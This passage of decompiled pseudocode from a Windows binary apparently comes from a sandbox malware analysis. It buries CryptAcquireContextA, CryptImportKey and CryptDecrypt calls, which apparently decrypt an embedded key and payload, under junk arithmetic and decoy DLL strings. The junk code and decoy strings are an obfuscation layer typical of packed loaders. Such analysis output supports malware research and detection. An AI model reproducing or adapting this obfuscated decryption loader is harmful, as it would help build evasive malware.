                                                						_v84 = _v84 + 1;
                                                						_t2018 =  *0x4fef24; // 0x0
                                                						if(E00407774(L"davclnt.dll", 1, _t2018) >= 0xb0) {
                                                							_t1851 =  *0x4fef44; // 0x38993
                                                							 *0x4feeec = _t1851;
                                                							_t1852 =  *0x4feef0; // 0x44632301
                                                							 *0x4feef0 = E0040489C(_t1852);
                                                						} else {
                                                							_t1859 = E004FEED0; // 0xc3c34ef0
                                                							E004FEED0 = E0040489C(_t1859);
                                                						}
                                                						_v56 = 0x4d - _v32;
                                                						_v180 = _v88 + 0x15;
                                                						asm("fild dword [ebp-0xb0]");
                                                						_v60 = E004048CC();
                                                					}
                                                					asm("fild dword [ebp-0x40]");
                                                					_v72 = E004048CC();
                                                					_v36 = _v48 - 0x30;
                                                					_t1847 = E004FEF20; // 0x6e687a1a
                                                					 *0x4feea0 = _t1847;
                                                					_t1848 =  *0x4fef04; // 0x43c14963
                                                					 *0x4feecc = _t1848;
                                                				}
                                                				 *0x4feef4 = 0xdd - E004FEED0;
                                                				_t977 =  *0x4fef44; // 0x38993
                                                				 *0x4fef14 = _t977 -  *0x4fef3c;
                                                				E004FEF34 = 0x72 - E004FEF2C;
                                                				_t981 =  *0x4fef40; // 0x3c79b5d4
                                                				 *0x4fef48 = _t981 + 0x70;
                                                				_t983 = E004FEF10; // 0x1cb931c0
                                                				E004FEF50 = _t983;
                                                				_t984 = E004FEF50; // 0xa3b3f6c0
                                                				_t2030 = _t984 -  *0x4feecc; // 0xd26bafe0
                                                				if(_t2030 < 0) {
                                                					E00406CF4( &_v24, L"CNB_0317.DLL");
                                                				}
                                                				_v17 = 0;
                                                				_v60 = _v92 * _v76;
                                                				_v64 = _v68 - 4;
                                                				_t989 =  *0x4fef18; // 0xbc3e19a
                                                				 *0x4fef18 = E0040489C(_t989);
                                                				_v36 = _v32 - 0xdd;
                                                				_v84 = _v44 + 0x51;
                                                				_v80 = _v40;
                                                				_push(_t2022);
                                                				_push(0x4f30c8);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t2024;
                                                				E004F0EBC( &E004FEF0C,  &E004FEF10, _t2030);
                                                				_t999 = E004FEF10; // 0x1cb931c0
                                                				 *0x4feeec = _t999;
                                                				E00407678(_v24, 0, 1,  &_v24);
                                                				_v52 = _v40 - _v48;
                                                				_v56 = _v84 - 0x2e;
                                                				_push(_v92);
                                                				_t1865 =  *0x4fef4c; // 0x43c1493c
                                                				_t1915 = E004FEF10; // 0x1cb931c0
                                                				_v76 = E004EE798(_v84, 0, _t1865, _t1915, _t2030);
                                                				_t1011 = CryptAcquireContextA( &_v104, 0, 0, 1, 0xf0000000); // executed
                                                				if(_t1011 == 0) {
                                                					_t1012 =  *0x4fef48; // 0xc3c34ef0
                                                					_t1916 =  *0x4fef4c; // 0x43c1493c
                                                					_v92 = E004EE798(_v64, 0, _v40, _t1916, __eflags);
                                                					 *0x4feeec = E004F0EBC( &_v48,  &_v68, __eflags);
                                                					_v48 = _v56 + _v84;
                                                					E00406CF4( &_v24, _v24);
                                                					_v88 = _v36 - _v76;
                                                					_v60 = _v68 * _v64;
                                                					_t1920 = _t1012;
                                                					 *[fs:eax] = _t1920;
                                                					__eflags = 0;
                                                					_pop(_t1921);
                                                					 *[fs:eax] = _t1921;
                                                					_push(E004F31FF);
                                                					return E00406A08( &_v28, 2);
                                                				} else {
                                                					_push(_t2022);
                                                					_push(0x4f2ff6);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t2024;
                                                					E00406CF4( &_v24, L"mqcertui.dll");
                                                					_t1032 =  *0x4fef48; // 0xc3c34ef0
                                                					 *0x4feed8 = _t1032;
                                                					_v148 = _v28;
                                                					if(_v148 != 0) {
                                                						_v148 =  *((intOrPtr*)(_v148 - 4));
                                                					}
                                                					if(_v148 <= 9) {
                                                						_v72 = _v92 * _v32;
                                                						_t1036 =  *0x4feedc; // 0xbc3e19a
                                                						 *0x4fef3c = _t1036;
                                                						_t1037 =  *0x4fef3c; // 0x1cb932a9
                                                						__eflags = _t1037 -  *0x4feed8; // 0x1cb9338e
                                                						if(__eflags >= 0) {
                                                							_t1038 = E004FEED0; // 0xc3c34ef0
                                                							 *0x4fef14 = _t1038;
                                                						} else {
                                                							E00407640(_v28, _v24);
                                                							if(__eflags != 0) {
                                                								_v80 = _v36 - _v64;
                                                							} else {
                                                								_t1830 =  *0x4feecc; // 0xd26bafe0
                                                								 *0x4feecc = E0040489C(_t1830);
                                                							}
                                                						}
                                                					} else {
                                                						_v44 = _v40 + _v40 * 2 + (_v40 + _v40 * 2) * 8;
                                                						_v52 = 0;
                                                						do {
                                                							_v56 = _v76 * _v84;
                                                							_v52 = _v52 + 1;
                                                						} while (_v52 != 0xc);
                                                					}
                                                					_t1039 =  *0x4fef14; // 0xb52124ca
                                                					 *0x4feea0 = _t1039 *  *0x4fef28;
                                                					if(_v52 - _v40 == _v36) {
                                                						_t1824 =  *0x4fef28; // 0x3c79b5d4
                                                						 *0x4feefc = _t1824 + 0xf;
                                                					}
                                                					_t1043 =  *0x4fef4c; // 0x43c1493c
                                                					E004FEF2C = (_t1043 << 2) + (_t1043 << 2) * 2;
                                                					_t1049 = CryptImportKey(_v104, _v8, 0x254, 0, 0,  &_v108); // executed
                                                					if(_t1049 == 0) {
                                                						_pop(_t1926);
                                                						 *[fs:eax] = _t1926;
                                                						_push(E004F3000);
                                                						_t1051 = E004FEF20; // 0x6e687a1a
                                                						 *0x4feea0 = _t1051;
                                                						_v32 = 0x3c - _v56;
                                                						_t1054 =  *0x4fef48; // 0xc3c34ef0
                                                						 *0x4feedc = _t1054;
                                                						__eflags = 0;
                                                						_v40 = 0;
                                                						do {
                                                							_v180 = _v44 + 0x3e;
                                                							asm("fild dword [ebp-0xb0]");
                                                							_v48 = E004048CC();
                                                							_v40 = _v40 + 1;
                                                							__eflags = _v40 - 0xc;
                                                						} while (_v40 != 0xc);
                                                						_v88 = _v68 * 0x4e;
                                                						CryptReleaseContext(_v104, 0);
                                                						_v40 = _v60 + _v76;
                                                						_v44 = _v92 + _v56;
                                                						_v48 = _v68 + 4;
                                                						_v80 = _v84 * 0x5c;
                                                						__eflags = 0xf6;
                                                						 *0x4fef40 = 0xf6 -  *0x4fef30;
                                                						E00407640(_v28, L"api-ms-win-core-datetime-l1-1-0.dll");
                                                						if(__eflags != 0) {
                                                							_t1073 =  *0x4feed8; // 0x1cb9338e
                                                							E004FEF2C = _t1073;
                                                							return _t1073;
                                                						}
                                                						_t1074 =  *0x4fef40; // 0x3c79b5d4
                                                						E004FEF50 = _t1074;
                                                						_t1075 =  *0x4fef30; // 0xa1d816
                                                						 *0x4feea0 = _t1075;
                                                						_t1076 =  *0x4feea0; // 0xa1d900
                                                						__eflags = _t1076 - E004FEF50; // 0xa3b3f6c0
                                                						if(__eflags <= 0) {
                                                							_t1077 =  *0x4feed8; // 0x1cb9338e
                                                							_t1078 = _t1077 + E004FEF00;
                                                							E004FEF10 = _t1078;
                                                							return _t1078;
                                                						}
                                                						_t1079 =  *0x4feea0; // 0xa1d900
                                                						 *0x4feedc = _t1079;
                                                						return _t1079;
                                                					}
                                                					_v52 = _v44;
                                                					if(_v32 - _v84 == _v56) {
                                                						_v64 = _v32 * 0xe7;
                                                						E00406CF4( &_v28, L"repdrvfs.dll");
                                                						_v76 = 0;
                                                						while(_v76 < 5) {
                                                							_v76 = _v76 + 1;
                                                							_v88 = 0;
                                                							do {
                                                								_t1823 = E004FEF20; // 0x6e687a1a
                                                								 *0x4feea0 = _t1823;
                                                								_v88 = _v88 + 1;
                                                							} while (_v88 != 5);
                                                						}
                                                					}
                                                					_v48 = _v36 * 0xc8;
                                                					_t1084 =  *0x4fef18; // 0xbc3e19a
                                                					E004FEF00 = _t1084;
                                                					_t1085 = E004FEF00; // 0xa3b3f6c0
                                                					 *0x4fef04 = _t1085;
                                                					_t1086 = E004FEF00; // 0xa3b3f6c0
                                                					_t2045 = _t1086 -  *0x4fef04; // 0x43c14963
                                                					if(_t2045 > 0) {
                                                						_v92 = 0xab - _v80;
                                                					}
                                                					_t1087 = E004FEF10; // 0x1cb931c0
                                                					_v180 = _t1087 + 4;
                                                					asm("fild dword [ebp-0xb0]");
                                                					E004FEF50 = E004048D8();
                                                					_t1090 =  *0x4feef0; // 0x44632301
                                                					_push(_t1090);
                                                					E004EE798(_v56, 0, _v88, _v48, 0xab);
                                                					_push(_t2022);
                                                					_push(0x4f2efa);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t2024;
                                                					_t1095 = CryptAcquireContextA( &_v96, 0, 0, 0x18, 0xf0000000); // executed
                                                					if(_t1095 == 0) {
                                                						_v56 = _v36 + 0x76;
                                                						_v60 = _v76 + _v92;
                                                						_v64 = _v44 * 0x7b;
                                                						_v32 = _v68 * 0xf5;
                                                						_v80 = _v52 + 0xea;
                                                						_t1104 = E004FEF2C; // 0xa1d900
                                                						 *0x4feea0 = _t1104 + E004FEED0;
                                                						_pop(_t1929);
                                                						 *[fs:eax] = _t1929;
                                                						_push(E004F2F04);
                                                						_v56 = _v72 * _v44;
                                                						_v60 = _v48 + _v48 * 4;
                                                						_t1111 = E004FEF38; // 0xc3c34fdc
                                                						 *0x4fef18 = _t1111;
                                                						_t1112 = E004FEF20; // 0x6e687a1a
                                                						E004FEF20 = E0040489C(_t1112);
                                                						_t1114 = E004FEF2C; // 0xa1d900
                                                						__eflags = _t1114 -  *0x4fef4c - 0x3d;
                                                						if(_t1114 -  *0x4fef4c >= 0x3d) {
                                                							_t1116 =  *0x4fef44; // 0x38993
                                                							__eflags = _t1116 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                							if(__eflags == 0) {
                                                								_v84 = 0;
                                                								__eflags = _v84 - 0xc;
                                                								while(_v84 < 0xc) {
                                                									_v84 = _v84 + 1;
                                                									E00406CF4( &_v24, _v24);
                                                									__eflags = _v84 - 0xc;
                                                								}
                                                							}
                                                						} else {
                                                							_t1145 = E004FEF34; // 0xc3c34ef0
                                                							E004FEF34 = _t1145;
                                                							_t1146 = E004FEF34; // 0xc3c34ef0
                                                							__eflags = _t1146 - E004FEF20; // 0x6e687a1a
                                                							if(__eflags >= 0) {
                                                								_v40 = _v64 - 0x8a;
                                                							} else {
                                                								_v32 = 0;
                                                								__eflags = _v32 - 0xe;
                                                								while(__eflags < 0) {
                                                									_v32 = _v32 + 1;
                                                									 *0x4fef48 = E004F0EBC( &_v68,  &E004FEF2C, __eflags);
                                                									__eflags = _v32 - 0xe;
                                                								}
                                                							}
                                                						}
                                                						_v76 = _v68 + 0x7a;
                                                						CryptDestroyKey(_v108);
                                                						E00406CF4( &_v24, _v24);
                                                						E004F0EBC( &_v64,  &_v68, __eflags);
                                                						_v40 = _v80 * 0xe9;
                                                						_v44 = _v60 * _v68;
                                                						_t1129 =  *0x4fef4c; // 0x43c1493c
                                                						 *0x4feef0 = _t1129;
                                                						_t1130 = E004FEF38; // 0xc3c34fdc
                                                						 *0x4feef4 = _t1130;
                                                						_t1131 =  *0x4feef0; // 0x44632301
                                                						__eflags = _t1131 -  *0x4feef4; // 0xb52124ca
                                                						if(__eflags <= 0) {
                                                							_t1133 = _v76 + 0xb7;
                                                							__eflags = _t1133;
                                                							_v56 = _t1133;
                                                						} else {
                                                							_t1141 =  *0x4feed8; // 0x1cb9338e
                                                							E004FEF0C = _t1141;
                                                						}
                                                						__eflags = _v80 - _v76 - 0xb7;
                                                						if(_v80 - _v76 >= 0xb7) {
                                                							_t1137 = _v64 + _v32;
                                                							__eflags = _t1137;
                                                							_v48 = _t1137;
                                                							return _t1137;
                                                						}
                                                						_v84 = 0;
                                                						__eflags = _v84 - 0xe;
                                                						if(_v84 < 0xe) {
                                                							_v84 = _v84 + 1;
                                                							return E00406CF4( &_v24, _v24);
                                                						}
                                                						return 0;
                                                					} else {
                                                						_t1152 =  *0x4fef30; // 0xa1d816
                                                						_t2048 = _t1152 +  *0x4fef4c -  *0x4fef4c; // 0x43c1493c
                                                						if(_t2048 <= 0) {
                                                							E00407678(_v24, 0, 1,  &_v24);
                                                							_t1158 = _v88 << 2;
                                                							__eflags = _t1158;
                                                							_v40 = _t1158 + _t1158 * 2;
                                                						} else {
                                                							_v84 = 0;
                                                							while(_v84 < 0xb) {
                                                								_v84 = _v84 + 1;
                                                								_t1815 =  *0x4fef30; // 0xa1d816
                                                								 *0x4feecc = _t1815;
                                                							}
                                                							_v44 = _v32 - _v72;
                                                							_t1808 =  *0x4feef0; // 0x44632301
                                                							 *0x4feef0 = E0040489C(_t1808);
                                                							_v52 = 0;
                                                							while(_v52 < 0) {
                                                								_v52 = _v52 + 1;
                                                								_v180 = _v92 + 4;
                                                								asm("fild dword [ebp-0xb0]");
                                                								_v64 = E004048D8();
                                                							}
                                                							_v76 = _v80 * 0x2a;
                                                						}
                                                						asm("fild dword [0x4feee0]");
                                                						E004FEF20 = E004048CC();
                                                						 *0x4fef40 =  *0x4fef40 - 0xd6;
                                                						_t1161 =  *0x4feef0; // 0x44632301
                                                						 *0x4feedc = _t1161 + 4;
                                                						_t1163 =  *0x4fef4c; // 0x43c1493c
                                                						E004FEF00 = _t1163 * E004FEF50;
                                                						_push(_t2022);
                                                						_push(0x4f2d41);
                                                						_push( *[fs:eax]);
                                                						 *[fs:eax] = _t2024;
                                                						_v84 = 0;
                                                						while(_v84 < 8) {
                                                							_v84 = _v84 + 1;
                                                							_t1795 =  *0x4fef14; // 0xb52124ca
                                                							 *0x4feea0 = _t1795;
                                                							_v48 = _v40 - _v64;
                                                							_v60 = 0;
                                                							while(_v60 < 2) {
                                                								_v60 = _v60 + 1;
                                                								_v72 = _v92 + 0x30;
                                                							}
                                                							if(0x96 - _v52 < 0x31) {
                                                								E00406CF4( &_v24, L"System.Runtime.Remoting.dll");
                                                							}
                                                						}
                                                						_t1167 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4feefc = _t1167;
                                                						_t1168 =  *0x4fef1c; // 0x0
                                                						_v152 = _t1168;
                                                						if(_v152 != 0) {
                                                							_v152 =  *((intOrPtr*)(_v152 - 4));
                                                						}
                                                						if(_v152 <= 0x1b) {
                                                							E00407678(_v24, 0, 1,  &_v24);
                                                							_t1172 = E004FEF0C * 0xdb;
                                                							__eflags = _t1172;
                                                							 *0x4feef4 = _t1172;
                                                						} else {
                                                							_v68 = _v36 * _v56;
                                                							_t1785 = E004FEF50; // 0xa3b3f6c0
                                                							E004FEF38 = _t1785;
                                                							_v32 = 0;
                                                							do {
                                                								_t1787 =  *0x4fef3c; // 0x1cb932a9
                                                								E004FEF50 = _t1787;
                                                								_t1788 =  *0x4feea0; // 0xa1d900
                                                								_t2062 = _t1788 - E004FEF50; // 0xa3b3f6c0
                                                								if(_t2062 <= 0) {
                                                									asm("fild dword [0x4feee8]");
                                                									 *0x4fef28 = E004048D8();
                                                								} else {
                                                									E004FEF34 = E004F0EBC( &_v44,  &_v72, _t2062);
                                                								}
                                                								_v32 = _v32 + 1;
                                                							} while (_v32 != 9);
                                                						}
                                                						_t1173 = E004FEF20; // 0x6e687a1a
                                                						E004FEF2C = _t1173 + E004FEF34;
                                                						_t1175 =  *0x4fef04; // 0x43c14963
                                                						 *0x4fef48 = _t1175 + 9;
                                                						_t1177 = E004FEED0; // 0xc3c34ef0
                                                						E004FEF50 = _t1177;
                                                						_t1178 =  *0x4feea0; // 0xa1d900
                                                						_t2064 = _t1178 - E004FEF50; // 0xa3b3f6c0
                                                						if(_t2064 <= 0) {
                                                							_t1179 =  *0x4fef40; // 0x3c79b5d4
                                                							E004FEF00 = _t1179;
                                                						} else {
                                                							_t1780 = E004FEF34; // 0xc3c34ef0
                                                							_push(_t1780);
                                                							E004FEF0C = E004EE798(_v60, 0, _v36, _v92, _t2064);
                                                						}
                                                						_v124 =  *_a4 + _v12 - 0x80;
                                                						_v116 = E004044B4(0x100);
                                                						_v44 = _v48 + 0xc8;
                                                						asm("fild dword [ebp-0x4c]");
                                                						_v52 = E004048D8();
                                                						_t1189 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4fef04 = _t1189;
                                                						E00406CF4( &_v24, L"NetEnumerateServiceAccounts");
                                                						_v88 = 0;
                                                						while(_v88 < 5) {
                                                							_v88 = _v88 + 1;
                                                							_t1773 = E004FEF38; // 0xc3c34fdc
                                                							if(_t1773 -  *0x4feef0 >= 0x63) {
                                                								_t1776 = _v56 + 4;
                                                								__eflags = _t1776;
                                                								_v180 = _t1776;
                                                								asm("fild dword [ebp-0xb0]");
                                                								_v40 = E004048D8();
                                                							} else {
                                                								_v72 = 0;
                                                								while(_v72 < 0xa) {
                                                									_v72 = _v72 + 1;
                                                									_t1779 =  *0x4feedc; // 0xbc3e19a
                                                									 *0x4feedc = _t1779;
                                                								}
                                                							}
                                                						}
                                                						_v76 = (_v68 << 4) + (_v68 << 4) * 2;
                                                						_push(_t2022);
                                                						_push(0x4f2c8c);
                                                						_push( *[fs:eax]);
                                                						 *[fs:eax] = _t2024;
                                                						_v52 = _v84 + 0x7f;
                                                						_v68 = _v64 * _v80;
                                                						_v72 = _v36 - _v60;
                                                						_v92 = 0;
                                                						if(_v92 < 2) {
                                                							_v92 = _v92 + 1;
                                                							_v88 = 0;
                                                							_t2071 = _v88 - 0xc;
                                                							while(_v88 < 0xc) {
                                                								_v88 = _v88 + 1;
                                                								_push(_v88);
                                                								_t1906 =  *0x4fef4c; // 0x43c1493c
                                                								_t2009 =  *0x4feecc; // 0xd26bafe0
                                                								_t1771 = E004FEF2C; // 0xa1d900
                                                								 *0x4feee0 = E004EE798(_t1771, 0, _t1906, _t2009, _t2071);
                                                							}
                                                						}
                                                						_v32 = 0;
                                                						do {
                                                							_v76 = _v40 + _v48;
                                                							_v32 = _v32 + 1;
                                                						} while (_v32 != 0x10);
                                                						 *0x4feedc = E004FEF50 * 0x9f;
                                                						E00404658(_v124, 0, 0x80, _v116);
                                                						_v124 =  *_a4 + _v12 - 0x84;
                                                						_v84 = 0;
                                                						while(_v84 < 3) {
                                                							_v84 = _v84 + 1;
                                                							E00407678(_v24, 0, 1,  &_v24);
                                                							_v36 = _v56 * 0xf9;
                                                							_t1766 =  *0x4feee0; // 0x747938b
                                                							 *0x4feee8 = _t1766;
                                                							_v48 = 0;
                                                							while(_v48 < 0xd) {
                                                								_v48 = _v48 + 1;
                                                								asm("fild dword [ebp-0x28]");
                                                								_v60 = E004048D8();
                                                							}
                                                						}
                                                						_v80 = 0;
                                                						_v68 = 0;
                                                						do {
                                                							E00407678(_v24, 0, 1,  &_v24);
                                                							_v68 = _v68 + 1;
                                                						} while (_v68 != 0xf);
                                                						_v88 = _v52 + 0xb5;
                                                						_t1221 =  *0x4fef40; // 0x3c79b5d4
                                                						E004FEF34 = _t1221 *  *0x4fef14;
                                                						_t1223 =  *0x4feee8; // 0xdcd0f434
                                                						_t2081 = _t1223 - E004FEF10 -  *0x4fef3c; // 0x1cb932a9
                                                						if(_t2081 == 0) {
                                                							_t1760 =  *0x4feed8; // 0x1cb9338e
                                                							 *0x4feecc = _t1760 + 4;
                                                						}
                                                						if(_v72 + _v44 != _v44) {
                                                							_t1227 =  *0x4feed8; // 0x1cb9338e
                                                							__eflags = _t1227 -  *0x4fef18 - E004FEF34; // 0xc3c34ef0
                                                							if(__eflags != 0) {
                                                								_t1229 =  *0x4fef28; // 0x3c79b5d4
                                                								_t1230 = _t1229 - 0x40;
                                                								__eflags = _t1230;
                                                								E004FEF0C = _t1230;
                                                							} else {
                                                								_t1756 = E004FEF10; // 0x1cb931c0
                                                								 *0x4feed8 = _t1756 *  *0x4feee8;
                                                							}
                                                						} else {
                                                							_t1758 =  *0x4fef18; // 0xbc3e19a
                                                							 *0x4fef14 = _t1758 + 0xaf;
                                                						}
                                                						E00404658(_v124, 0, 4,  &_v136);
                                                						asm("fild dword [ebp-0x34]");
                                                						_v44 = E004048CC();
                                                						_v52 = _v84 - _v32;
                                                						_v60 = _v40 + 2;
                                                						_t1237 = E004FEF2C; // 0xa1d900
                                                						 *0x4fef14 = _t1237;
                                                						_t1238 =  *0x4feef4; // 0xb52124ca
                                                						E004FEF20 = _t1238;
                                                						_v72 = _v92 - _v80;
                                                						_v112 = 0x80;
                                                						_t1241 =  *0x4feed8; // 0x1cb9338e
                                                						 *0x4feed8 = E0040489C(_t1241);
                                                						_v40 = 0;
                                                						_t2084 = _v40 - 7;
                                                						if(_v40 < 7) {
                                                							_v40 = _v40 + 1;
                                                							_v52 = _v44 - 0x92;
                                                							 *0x4feee8 = E004F0EBC( &_v40, 0x4feee8, _t2084);
                                                						}
                                                						_t1244 =  *0x4feefc; // 0x4b08dcc7
                                                						 *0x4fef30 = _t1244;
                                                						_v88 = E004F0EBC( &E004FEF38,  &_v36, _t2084);
                                                						_push(_v72);
                                                						_t1248 =  *0x4fef14; // 0xb52124ca
                                                						_v48 = E004EE798(_t1248, 0, _v56, _v64, _t2084);
                                                						_v92 = _v72 * 0xef;
                                                						_t1254 = CryptDecrypt(_v108, 0, 0xffffffff, 0, _v116,  &_v112); // executed
                                                						if(_t1254 == 0) {
                                                							L248:
                                                							_v88 = 0;
                                                							E00406CF4( &_v24, _v24);
                                                							_t1258 =  *0x4fee98; // 0x0
                                                							_v172 = _t1258;
                                                							__eflags = _v172;
                                                							if(_v172 != 0) {
                                                								_t1296 = _v172 - 4;
                                                								__eflags = _t1296;
                                                								_v172 =  *_t1296;
                                                							}
                                                							__eflags = _v172 - 0x11;
                                                							if(__eflags <= 0) {
                                                								_t1260 = _v92 + 0x76;
                                                								__eflags = _t1260;
                                                								_v180 = _t1260;
                                                								asm("fild dword [ebp-0xb0]");
                                                								_v60 = E004048CC();
                                                							} else {
                                                								_t1292 = E004FEF34; // 0xc3c34ef0
                                                								_push(_t1292);
                                                								_t1884 = E004FEED0; // 0xc3c34ef0
                                                								_t1953 =  *0x4fef18; // 0xbc3e19a
                                                								_t1293 =  *0x4fef48; // 0xc3c34ef0
                                                								_v56 = E004EE798(_t1293, 0, _t1884, _t1953, __eflags);
                                                							}
                                                							_t1262 = E004FEF50; // 0xa3b3f6c0
                                                							 *0x4fef28 = _t1262;
                                                							_v84 = _v80 - _v36;
                                                							_v32 = _v52 + _v72;
                                                							_v40 = _v44 + _v76;
                                                							_t1269 =  *0x4feec8; // 0x0
                                                							_v176 = _t1269;
                                                							__eflags = _v176;
                                                							if(_v176 != 0) {
                                                								_t1290 = _v176 - 4;
                                                								__eflags = _t1290;
                                                								_v176 =  *_t1290;
                                                							}
                                                							__eflags = _v176 - 0xbd;
                                                							if(_v176 <= 0xbd) {
                                                								_t1270 =  *0x4feea0; // 0xa1d900
                                                								 *0x4fef14 = _t1270;
                                                							} else {
                                                								_t1288 =  *0x4fef44; // 0x38993
                                                								E004FEF00 = _t1288;
                                                							}
                                                							_pop(_t1949);
                                                							 *[fs:eax] = _t1949;
                                                							_push(E004F2C93);
                                                							E00406CF4( &_v24, L"api-ms-win-core-util-l1-1-0.dll");
                                                							E00406CF4( &_v24, L"dmintf.dll");
                                                							_v48 = _v36 * 0x72;
                                                							_t1277 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feefc = E0040489C(_t1277);
                                                							_t1279 =  *0x4feeec; // 0xb52124f2
                                                							 *0x4fef04 = _t1279;
                                                							_t1280 =  *0x4feefc; // 0x4b08dcc7
                                                							__eflags = _t1280 -  *0x4fef04; // 0x43c14963
                                                							if(__eflags > 0) {
                                                								__eflags = 0x93;
                                                								_v68 = 0x93 - _v56;
                                                							}
                                                							_t1282 = _v40 * _v72;
                                                							__eflags = _t1282;
                                                							_v80 = _t1282;
                                                							_t1283 =  *0x4fef30; // 0xa1d816
                                                							 *0x4fef44 = _t1283;
                                                							return E004044D0(_v116);
                                                						} else {
                                                							_v180 = _v40 + 0xe9;
                                                							asm("fild dword [ebp-0xb0]");
                                                							_v68 = E004048CC();
                                                							_v72 = _v52 * _v32;
                                                							_v80 = _v56;
                                                							_v88 = 0;
                                                							do {
                                                								E00407678(_v24, 0, 1,  &_v24);
                                                								_v76 = _v48;
                                                								_v88 = _v88 + 1;
                                                							} while (_v88 != 0xc);
                                                							_v44 = 0;
                                                							while(_v44 < 3) {
                                                								_v44 = _v44 + 1;
                                                								 *0x4fef4c =  *0x4feef0 * 0x44;
                                                							}
                                                							_t1314 = CryptImportKey(_v96, _v116, _v112, 0, 0,  &_v100); // executed
                                                							if(_t1314 == 0) {
                                                								_t1956 =  *0x4fef24; // 0x0
                                                								_t1316 = E00407774(L"CNB_0309.DLL", 1, _t1956);
                                                								__eflags = _t1316 - 0xee;
                                                								if(_t1316 != 0xee) {
                                                									__eflags = 0xf4;
                                                									_v36 = 0xf4 - _v68;
                                                								}
                                                								_v48 = _v76 - 0x32;
                                                								_t1319 = E004FEF00; // 0xa3b3f6c0
                                                								E004FEF00 = E0040489C(_t1319);
                                                								_t1321 = E004FEF34; // 0xc3c34ef0
                                                								E004FEF0C = _t1321;
                                                								_t1322 = E004FEF0C; // 0xb52124bf
                                                								__eflags = _t1322 - E004FEF00; // 0xa3b3f6c0
                                                								if(__eflags < 0) {
                                                									_t1332 = _v84 * _v88;
                                                									__eflags = _t1332;
                                                									_v72 = _t1332;
                                                								}
                                                								_t1323 = E004FEF2C; // 0xa1d900
                                                								 *0x4fef40 = _t1323;
                                                								_v180 = _v60 + 0x82;
                                                								asm("fild dword [ebp-0xb0]");
                                                								_v52 = E004048CC();
                                                								_t1328 = E00407774(L"WininetPlugin.dll", 1, _v24);
                                                								__eflags = _t1328 - 0xe3;
                                                								if(_t1328 != 0xe3) {
                                                									_t1330 = _v92 - _v44;
                                                									__eflags = _t1330;
                                                									_v40 = _t1330;
                                                								}
                                                								goto L248;
                                                							} else {
                                                								_v68 = _v76;
                                                								_v44 = _v32 + 0x43;
                                                								_v64 = _v56 - _v36;
                                                								_v48 = 0;
                                                								_t2091 = _v48 - 0xb;
                                                								while(_v48 < 0xb) {
                                                									_v48 = _v48 + 1;
                                                									_push(_v60);
                                                									_t1749 =  *0x4feee0; // 0x747938b
                                                									 *0x4fef40 = E004EE798(_t1749, 0, _v72, _v72, _t2091);
                                                								}
                                                								_v60 = _v52 * _v80;
                                                								_v72 = _v40 * 0x66;
                                                								_push(_t2022);
                                                								_push(0x4f2a6c);
                                                								_push( *[fs:eax]);
                                                								 *[fs:eax] = _t2024;
                                                								_v120 = E004044B4(_v136 + 0x100000);
                                                								_v48 = _v64 * 0x2c;
                                                								_t1349 = E004FEF50; // 0xa3b3f6c0
                                                								E004FEF00 = _t1349;
                                                								_t1350 =  *0x4fef04; // 0x43c14963
                                                								 *0x4fef04 = E0040489C(_t1350);
                                                								_t1352 = E004FEF00; // 0xa3b3f6c0
                                                								_t2093 = _t1352 -  *0x4fef04; // 0x43c14963
                                                								if(_t2093 < 0) {
                                                									asm("fild dword [ebp-0x38]");
                                                									_v72 = E004048D8();
                                                									_v88 = _v36 * 0xda;
                                                									_v92 = 0x6d - _v68;
                                                									_v40 = _v76 + 0xd4;
                                                								}
                                                								_t1353 =  *0x4feefc; // 0x4b08dcc7
                                                								E004FEF20 = _t1353 - 0xeb;
                                                								_t1355 =  *0x4fef3c; // 0x1cb932a9
                                                								 *0x4fef44 = _t1355 + 4;
                                                								_t1357 =  *0x4fef28; // 0x3c79b5d4
                                                								 *0x4feed8 = _t1357 +  *0x4feee8;
                                                								_t1359 =  *0x4feed8; // 0x1cb9338e
                                                								 *0x4feee0 = _t1359;
                                                								_push(_t2022);
                                                								_push(0x4f29a2);
                                                								_push( *[fs:eax]);
                                                								 *[fs:eax] = _t2024;
                                                								_v72 = _v64 * 0x7a;
                                                								_v80 = 0;
                                                								do {
                                                									_v88 = 0;
                                                									do {
                                                										E00407678(_v24, 0, 1,  &_v24);
                                                										_v88 = _v88 + 1;
                                                									} while (_v88 != 4);
                                                									_t1367 =  *0x4feef4; // 0xb52124ca
                                                									 *0x4feeec = _t1367;
                                                									_t1368 = E004FEF50; // 0xa3b3f6c0
                                                									 *0x4feef4 = _t1368;
                                                									_v80 = _v80 + 1;
                                                								} while (_v80 != 0xf);
                                                								_v92 = 0xf7 - _v68;
                                                								_v48 = 0;
                                                								while(_v48 < 0xf) {
                                                									_v48 = _v48 + 1;
                                                									_v76 = 0;
                                                									while(_v76 < 0) {
                                                										_v76 = _v76 + 1;
                                                										_t1741 =  *0x4feecc; // 0xd26bafe0
                                                										 *0x4feeec = _t1741;
                                                									}
                                                									_v32 = _v44 * 0xae;
                                                								}
                                                								E00407678(_v24, 0, 1,  &_v28);
                                                								_t1375 = E004FEF20; // 0x6e687a1a
                                                								 *0x4feecc = _t1375 - 0xc8;
                                                								asm("cdq");
                                                								_v132 =  *_a4 - 0x84;
                                                								_v128 = 1;
                                                								_v72 = _v44 - _v40;
                                                								_t1382 =  *0x4fef14; // 0xb52124ca
                                                								 *0x4fef3c = _t1382;
                                                								_t1383 =  *0x4fef44; // 0x38993
                                                								 *0x4fef44 = E0040489C(_t1383);
                                                								_t1385 =  *0x4fef3c; // 0x1cb932a9
                                                								_t2103 = _t1385 -  *0x4fef44; // 0x38993
                                                								if(_t2103 >= 0) {
                                                									_t1386 =  *0x4feecc; // 0xd26bafe0
                                                									 *0x4feecc = E0040489C(_t1386);
                                                								} else {
                                                									_t1732 = E004FEF50; // 0xa3b3f6c0
                                                									E004FEED0 = _t1732;
                                                									_v48 = _v68;
                                                									_t1734 = E004FEF50; // 0xa3b3f6c0
                                                									 *0x4feef0 = _t1734;
                                                									_v52 = 0;
                                                									while(_v52 < 0xa) {
                                                										_v52 = _v52 + 1;
                                                										_v180 = _v80 + 0x9c;
                                                										asm("fild dword [ebp-0xb0]");
                                                										_v88 = E004048CC();
                                                									}
                                                								}
